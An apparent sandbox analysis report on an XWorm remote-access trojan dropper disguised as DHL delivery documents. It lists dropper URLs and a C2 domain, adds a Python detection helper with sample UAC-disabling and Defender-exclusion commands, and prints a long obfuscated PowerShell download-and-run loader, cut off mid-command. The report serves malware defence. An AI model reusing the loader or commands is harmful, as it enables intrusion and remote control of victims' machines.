Analysis

  • max time kernel
    146s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/03/2025, 16:00

General

  • Target

    awb_post_dhl_delivery_documents_pdf.vbs

  • Size

    177KB

  • MD5

    63fa1b58e48acb386a8b650951530771

  • SHA1

    adf30b16e042e3d4cf2c5c570ec0afcf446afac0

  • SHA256

    119a6e21aa53c235fe4a946d74e870b41823d1cf49c39d29a528e1a0ddfd9042

  • SHA512

    8c328b2876d05cb649190578565daa152f145e0dce86b3aae8eca826f09796040fcc856911050e2540a9df92cf923c90cac6848e5326e2040dd415993dcd7107

  • SSDEEP

    384:JffffffffQffffffffQffffffffmh44444444D4c0YAL8ZNGJoNycffffffffQfS:K0Yq/G

Malware Config

Extracted

  • Language
    ps1
  • Source URLs
    • ps1.dropper
      https://www.pastery.net/rdakwa/raw/
    • exe.dropper
      https://files.catbox.moe/sakuuo.msu
    • exe.dropper
      https://files.catbox.moe/6sdjc5.msu
    • exe.dropper
      https://www.pastery.net/rdakwa/raw/

Extracted

  • Family
    xworm
  • Version
    5.0
  • C2
    freeetradingzone.duckdns.org:3911
  • Mutex
    LpxI7BBpG4bLELYn
  • Attributes
    • install_file
      USB.exe
  • aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 11 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
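
The signature list above is the sandbox's verdict. To turn the behaviours it names (PowerShell obfuscation, Defender exclusions, the EnableLUA change, hidden windows, ping-then-delete cleanup, Startup-folder copy) into something a SOC can run over its own process-creation telemetry, such as Sysmon Event ID 1 or an EDR equivalent, here is an added Python triage helper. It is not part of this report; the rule patterns are written against the literal command lines shown in the process tree below, and the sample events it runs on are constructed from those command lines (the staging path is abbreviated), plus one benign control line.

```python
import re

# Each rule is (tag, regex over the command line). The patterns are written
# against the literal strings this report shows; widen them deliberately
# before using them as production detections.
RULES = [
    ("powershell-char-cast-obfuscation", re.compile(r"\[char\]\d+", re.I)),
    ("powershell-base64-unicode-decode",
     re.compile(r"Unicode\.GetString\(.*FromBase64String", re.I)),
    ("defender-exclusion-added", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("uac-disabled-via-enablelua",
     re.compile(r"reg(\.exe)?\s+ADD\s+HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
                r"\\Policies\\System\s+/v\s+EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I)),
    ("hidden-window", re.compile(r"-WindowStyle\s+Hidden", re.I)),
    ("execution-policy-bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
    ("ping-then-delete-cleanup", re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+1\s*&\s*del\b", re.I)),
    ("startup-folder-persistence",
     re.compile(r"Copy-Item\b.*\\Start Menu\\Programs\\Startup", re.I)),
    ("msu-installed-via-wusa", re.compile(r"wusa\.exe\s+\S+\s+/quiet", re.I)),
    ("analysis-tool-check", re.compile(r"get-process\s+'Wireshark'", re.I)),
    ("locallow-staging-dir", re.compile(r"AppData\\LocalLow\\Daft Sytem \(x86\)", re.I)),
]


def triage(cmdline, parent_image=""):
    """Return the rule tags that fire for one process-creation event."""
    hits = [tag for tag, rx in RULES if rx.search(cmdline)]
    # The root relationship in the tree: a script host spawning PowerShell.
    if parent_image.lower().endswith("wscript.exe") and "powershell" in cmdline.lower():
        hits.append("wscript-spawns-powershell")
    return hits


def triage_events(events):
    """events: iterable of (parent_image, cmdline). Returns a list of
    (cmdline, tags) for the events that fired at least one rule."""
    out = []
    for parent, cmd in events:
        tags = triage(cmd, parent)
        if tags:
            out.append((cmd, tags))
    return out


# Constructed sample events: (parent image, command line), taken from the
# process tree of this report, with the staging path abbreviated, plus one
# benign control line.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\WScript.exe",
     "powershell.exe -command $wfdyx = 'Ow' + [char]66 + '9ADsAIA';"
     "$fjptf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $wfdyx ));"
     "powershell $fjptf"),
    ("powershell.exe",
     "powershell $S = 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\' ; "
     "Add-MpPreference -ExclusionPath $S -force ;"),
    ("cmd.exe",
     "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System "
     "/v EnableLUA /t REG_DWORD /d 0 /f"),
    ("powershell.exe",
     "cmd.exe /c ping 127.0.0.1 -n 1 & del \"C:\\Users\\Admin\\AppData\\Local\\Temp\\DLL01.txt\""),
    ("cmd.exe",
     "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file "
     "'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem (x86)\\Program Rules NVIDEO\\hmpht.ps1'"),
    ("explorer.exe", "notepad.exe C:\\Users\\Admin\\notes.txt"),
]

if __name__ == "__main__":
    for cmd, tags in triage_events(SAMPLE_EVENTS):
        print(", ".join(tags), "<-", cmd[:70])
```

Rules that fire on a single event are useful for hunting; for alerting, weight the parent/child relationship and the EnableLUA or Add-MpPreference hits highest, since those are rarely legitimate from a script host's descendants.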

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $wfdyx = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHcAeQ' + [char]66 + '5AEUAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EADEARAAgAEQAJwAnACAALAAgACcAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAJwAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGcAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'oAGkAbg' + [char]66 + 'zAGkAZw' + [char]66 + 'oAHQAaQ' + [char]66 + '0AC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAdA' + [char]66 + 'yAGUAYQ' + [char]66 + 'tAGYAYQ' + [char]66 + 'yAG0AcwAuAGIAaQ' + [char]66 + 'uACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 
'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAdw' + [char]66 + '5AHkARQ' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAdw' + [char]66 + '5AHkARQ' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAHcAeQ' + [char]66 + '5AEUAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHIARg' + [char]66 + 'kAFkAUgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + '3AHkAeQ' + [char]66 + 'FAFIAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAbw' + [char]66 + 'JAFkAZg' + [char]66 + '0ACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAApACAAJwAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + 
[char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'vAEkAWQ' + [char]66 + 'mAHQAJAAnACAAPQAgAHcAeQ' + [char]66 + '5AEUAUgAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAGIAeg' + [char]66 + 'NAGUAUAAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAARA' + [char]66 + 'lAHoAaw' + [char]66 + 'TACQAOwApAGwASw' + [char]66 + 'UAGwAVAAkACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAEQAZQ' + [char]66 + '6AGsAUwAkADsAIAApACAARA' + [char]66 + 'KAGcAUA' + [char]66 + 'JACQAIAAoAGEAdA' + [char]66 + 'hAEQAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AUg' + [char]66 + 'JAEYATQ' + [char]66 + 'rACQAIAA9ACAAbA' + [char]66 + 'LAFQAbA' + [char]66 + 'UACQAOwAgACkAIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + 'EAEoAZw' + [char]66 + 'QAEkAJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'SAEkARg' + [char]66 + 'NAGsAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + 'SAEkARg' + [char]66 + 'NAGsAJAA7ACAAKQAgACcAdA' + [char]66 + '4AHQALgAyADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + 
[char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'iAHoATQ' + [char]66 + 'lAFAAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAnADgARg' + [char]66 + 'UAFUAJwAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAZg' + [char]66 + 'xAE4AWg' + [char]66 + 'jACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'VAHMAeg' + [char]66 + 'XAFQAJAA7AHkATQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'CACAAPQAgAFUAcw' + [char]66 + '6AFcAVAAkACAAOw' + [char]66 + 'VAHMAeg' + [char]66 + 'XAFQAJAAgAD0AIA' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOwAgACkAIA' + [char]66 + 'qAHoAdg' + [char]66 + 'kAGgAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + 'VAHMAeg' + [char]66 + 'XAFQAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAA7ACkAIAAnAC8Adw' + [char]66 + 'hAHIALw' + [char]66 + 'hAHcAaw' + [char]66 + 'hAGQAcgAvAHQAZQ' + [char]66 + 'uAC4AeQ' + [char]66 + 'yAGUAdA' + [char]66 + 'zAGEAcAAuAHcAdw' + [char]66 + 
'3AC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACgAIAA9ACAAag' + [char]66 + '6AHYAZA' + [char]66 + 'oACQAOw' + [char]66 + '9ADsAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIA' + [char]66 + 'uAHIAdQ' + [char]66 + '0AGUAcgA7ACkAKQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHIARg' + [char]66 + 'kAFkAUgAkADsAew' + [char]66 + '5AE0AZQ' + [char]66 + 'zAGEAQgAgAG4Abw' + [char]66 + 'pAHQAYw' + [char]66 + 'uAHUARgA7AGUAcw' + [char]66 + 'hAGIAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAJAA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 
+ 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' 
+ [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'XAEMAdw' + [char]66 + '' + [char]66 + 'AEcAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARQ' + [char]66 + 'vAEEAbA' + [char]66 + 'nACQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAWQ' + [char]66 + 'OAEsAYg' + [char]66 + 'mACQAKAAgAD0AIA' + [char]66 + 'FAG8AQQ' + [char]66 + 'sAGcAJAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACAAKAAgAD0AIA' + [char]66 + 'XAEMAdw' + [char]66 + '' + [char]66 + 'AEcAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFkATg' + [char]66 + 'LAGIAZgAkACgAIAAsAGQAYg' + [char]66 + 'rAHEAdAAkACAAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGsAag' + [char]66 + 'yAG4AbgAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'rAGoAcg' + [char]66 + 'uAG4AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + 
[char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'rAGoAcg' + [char]66 + 'uAG4AJAA7AH0AOwAgACkAZA' + [char]66 + 'iAGsAcQ' + [char]66 + '0ACQAKAAgAD0AIA' + [char]66 + 'kAGIAaw' + [char]66 + 'xAHQAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIA' + [char]66 + 'zAG8Abg' + [char]66 + 'lAG0AJAAgAD0AIA' + [char]66 + 'kAGIAaw' + [char]66 + 'xAHQAJA' + [char]66 + '7ACAAKQAgAHcAVg' + [char]66 + 'nAGgARQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAdw' + [char]66 + 'WAGcAaA' + [char]66 + 'FACQAOwAnAHUAcw' + [char]66 + 'tAC4ANQ' + [char]66 + 'jAGoAZA' + [char]66 + 'zADYALw' + [char]66 + 'lAG8AbQAuAHgAbw' + [char]66 + 'iAHQAYQ' + [char]66 + 'jAC4Acw' + [char]66 + 'lAGwAaQ' + [char]66 + 'mAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHMAbw' + [char]66 + 'uAGUAbQAkADsAJw' + [char]66 + '1AHMAbQAuAG8AdQ' + [char]66 + '1AGsAYQ' + [char]66 + 'zAC8AZQ' + [char]66 + 'vAG0ALg' + [char]66 + '4AG8AYg' + [char]66 + '0AGEAYwAuAHMAZQ' + [char]66 + 